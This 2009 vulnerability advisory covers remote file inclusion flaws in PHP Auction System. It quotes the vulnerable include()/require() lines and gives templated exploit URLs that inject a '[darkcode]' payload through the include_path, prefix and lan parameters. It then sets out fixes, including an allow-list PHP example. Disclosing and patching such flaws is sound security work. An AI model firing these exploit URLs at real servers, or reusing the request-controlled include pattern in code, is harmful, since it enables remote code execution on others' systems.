# Title : PHPAuctionSystem Multiple Remote File Inclusion Vulnerabilities
# Published : 2009-01-06
# Author : darkmasking
=============================================================================================================

 PHPAuctionSystem Multiple Remote File Inclusion Vulnerability

=============================================================================================================
 Author : ~darkmasking~
 Date : January, 6th 2009
 Web : https://www.idsafeshield.com
 Contact : support[at]idsafeshield[dot]com
 Critical Level : Dangerous
-------------------------------------------------------------------------------------------------------------
 Affected software description :
 Software : PHP Auction System
 Vendor : http://www.phpauctions.info/
 Price : $59.99
=============================================================================================================

 [~] Vulnerable files

 [+] All files below are affected through the "include_path" variable. None of
     them reads include_path from $_GET itself; the variable can only be set from
     the request when register_globals = On, which is the same dependency the
     "lan" handling further down relies on (it tests $_GET['lan'] but assigns $lan).

 ./includes/settings.inc.php
   $password_file = $include_path."passwd.inc.php";
   include($password_file);
   include $include_path."fonts.inc.php";
   include $include_path."fontsize.inc.php";
   include($include_path."currency.inc.php");
   include($include_path."errors.inc.php");
   include($include_path."https.inc.php");

 ./includes/auction_confirmation.inc.php
   (no direct use of $include_path; reaches the sink only through messages.inc.php)
   require("./includes/messages.inc.php");

 ./includes/converter.inc.php
   include($include_path."nusoap.php");

 ./includes/messages.inc.php
   require($include_path.'messages.'.$language.'.inc.php');

 ./includes/user_confirmation.inc.php
   (no direct use of $include_path; reaches the sink only through messages.inc.php)
   require("./includes/messages.inc.php");

 [+] The two files below build their paths from "prefix", not "include_path", so
     the controllable variable there is prefix (same register_globals dependency):

 ./includes/stats.inc.php
   include $prefix."includes/useragent.inc.php";
   include $prefix."includes/domains.inc.php";

 ./includes/useragent.inc.php
   include $prefix."includes/browsers.inc.php";
   include $prefix."includes/platforms.inc.php";

 [+] Both files below are affected by the "lan" parameter. The check is on
     $_GET['lan'] but the assignment uses $lan, so the value only arrives with
     register_globals = On. The USERLANGUAGE cookie is copied into $language
     without validation as well and reaches the same require().

 ./browse.php
 ./search.php
   if(!empty($_GET['lan'])) {
       $language = $lan;
       $_SESSION['language'] = $language;

       #// Set language cookie
       setcookie("USERLANGUAGE",$lan,time()+31536000,"/");
   } elseif(empty($_SESSION['language']) && !isset($_COOKIE['USERLANGUAGE'])) {
       $language = $SETTINGS['defaultlanguage'];
       $_SESSION['language'] = $language;

       #// Set language cookie
       setcookie("USERLANGUAGE",$language,time()+31536000);
   } elseif(isset($_COOKIE['USERLANGUAGE'])) {
       $language = $_COOKIE['USERLANGUAGE'];
   }

   require($include_path.'messages.'.$language.'.inc.php');

-------------------------------------------------------------------------------------------------------------

 [~] Exploit

 [+] "include_path" variable (requires register_globals = On; each include appends
     its own filename to the value, so the payload location must tolerate that suffix)

 http://www.darkvictims.com/[path]/includes/settings.inc.php?include_path=[darkcode]
 http://www.darkvictims.com/[path]/includes/auction_confirmation.inc.php?include_path=[darkcode]
 http://www.darkvictims.com/[path]/includes/converter.inc.php?include_path=[darkcode]
 http://www.darkvictims.com/[path]/includes/messages.inc.php?include_path=[darkcode]
 http://www.darkvictims.com/[path]/includes/user_confirmation.inc.php?include_path=[darkcode]

 [+] "prefix" variable (stats.inc.php and useragent.inc.php build their paths from
     $prefix, not $include_path, so this is the variable to set there)

 http://www.darkvictims.com/[path]/includes/stats.inc.php?prefix=[darkcode]
 http://www.darkvictims.com/[path]/includes/useragent.inc.php?prefix=[darkcode]

 [+] "lan" parameter (also requires register_globals = On; the value is wrapped as
     messages.<lan>.inc.php, and the USERLANGUAGE cookie reaches the same require()
     when lan is empty)

 http://www.darkvictims.com/[path]/browse.php?lan=[darkcode]
 http://www.darkvictims.com/[path]/search.php?lan=[darkcode]

-------------------------------------------------------------------------------------------------------------

 [~] How to fix this vulnerability

 Edit the source code to ensure that input is properly validated. Where possible,
 make a list of accepted filenames (here: the language codes that actually exist
 as includes/messages.<lang>.inc.php) and restrict the input to that list, using
 an exact comparison rather than a pattern. Do not derive $include_path or $prefix
 from request data at all; set them to fixed values inside the application.

 For PHP, the option allow_url_fopen normally allows a programmer to open a remote
 file using a URL rather than a local file path; since PHP 5.2, include and require
 of a URL are additionally gated by allow_url_include, which is off by default.
 It is recommended to keep both disabled in php.ini, and to disable register_globals,
 without which the include_path, prefix and lan variables above cannot be set from
 the request. Note that disabling remote URLs does not stop inclusion of local files
 through the same variables, so the code fix is still required.
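The following is an added example, not PHPAuctionSystem's own code, showing what the
allow-list fix looks like when applied to the browse.php/search.php language block and
to the $include_path that feeds the require() in messages.inc.php. It assumes PHP 7 or
later, that the message files live in includes/messages.<lang>.inc.php next to the
script, that language codes look like "en" or "pt_BR" (the regular expression is an
assumption, not taken from the product), and that $SETTINGS['defaultlanguage'] exists
as in the original:

```php
<?php
// Added example (not the vendor's code): hardened language selection for
// PHPAuctionSystem's browse.php/search.php.
// Assumptions: PHP >= 7, message files at includes/messages.<lang>.inc.php,
// language codes matching "en" or "pt_BR", $SETTINGS['defaultlanguage'] defined.

// 1. Include paths come from the script location, never from the request.
//    With register_globals off this is redundant; hard-coding it means a
//    misconfigured php.ini can no longer turn $include_path into an RFI sink.
$include_path = __DIR__ . '/includes/';

// 2. Allow-list: the language codes that exist on disk, discovered once.
//    Only names matching a strict pattern are accepted, so a stray file in the
//    directory cannot widen the list.
function available_languages(string $dir): array
{
    $langs = [];
    foreach (glob($dir . 'messages.*.inc.php') ?: [] as $file) {
        if (preg_match('/^messages\.([a-z]{2}(?:_[A-Z]{2})?)\.inc\.php$/', basename($file), $m)) {
            $langs[] = $m[1];   // messages.en.inc.php -> "en"
        }
    }
    return $langs;
}

// 3. Selection order follows the original intent (GET, then session, then
//    cookie, then default), but every candidate is checked against the
//    allow-list with a strict, exact comparison before it can touch a filename.
//    The original block tested the session value only as a flag and copied the
//    cookie into $language without any validation.
function select_language(array $get, array $session, array $cookie, array $settings, array $allowed): string
{
    $candidates = [
        $get['lan']                  ?? null,   // lan[]=x arrives as an array and is rejected below
        $session['language']         ?? null,
        $cookie['USERLANGUAGE']      ?? null,
        $settings['defaultlanguage'] ?? null,
    ];
    foreach ($candidates as $c) {
        if (is_string($c) && in_array($c, $allowed, true)) {
            return $c;
        }
    }
    // Even the configured default is missing on disk: fail closed instead of
    // building a path from an unvalidated name.
    throw new RuntimeException('no valid language file available');
}

$allowed  = available_languages($include_path);
$language = select_language($_GET, $_SESSION ?? [], $_COOKIE, $SETTINGS ?? [], $allowed);

$_SESSION['language'] = $language;
// Path "/" as in the original; HttpOnly so client-side script cannot read or
// plant the value. The cookie is re-validated on every request anyway.
setcookie('USERLANGUAGE', $language, time() + 31536000, '/', '', false, true);

// The sink keeps its original shape, but both components of the filename are
// now chosen by the application rather than by the client.
require $include_path . 'messages.' . $language . '.inc.php';
```

The point of the design is that the require() line does not need to change: once
$include_path is a constant and $language can only ever be one of the names read from
the directory, no combination of GET parameter, cookie or register_globals variable
can steer the path, with or without allow_url_include.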

-------------------------------------------------------------------------------------------------------------

 [~] Greetz

 JUST FOR MYSELF [ Sorry bro, haven't got any friends yet :) ]


=============================================================================================================
# www.Syue.com [2009-01-06]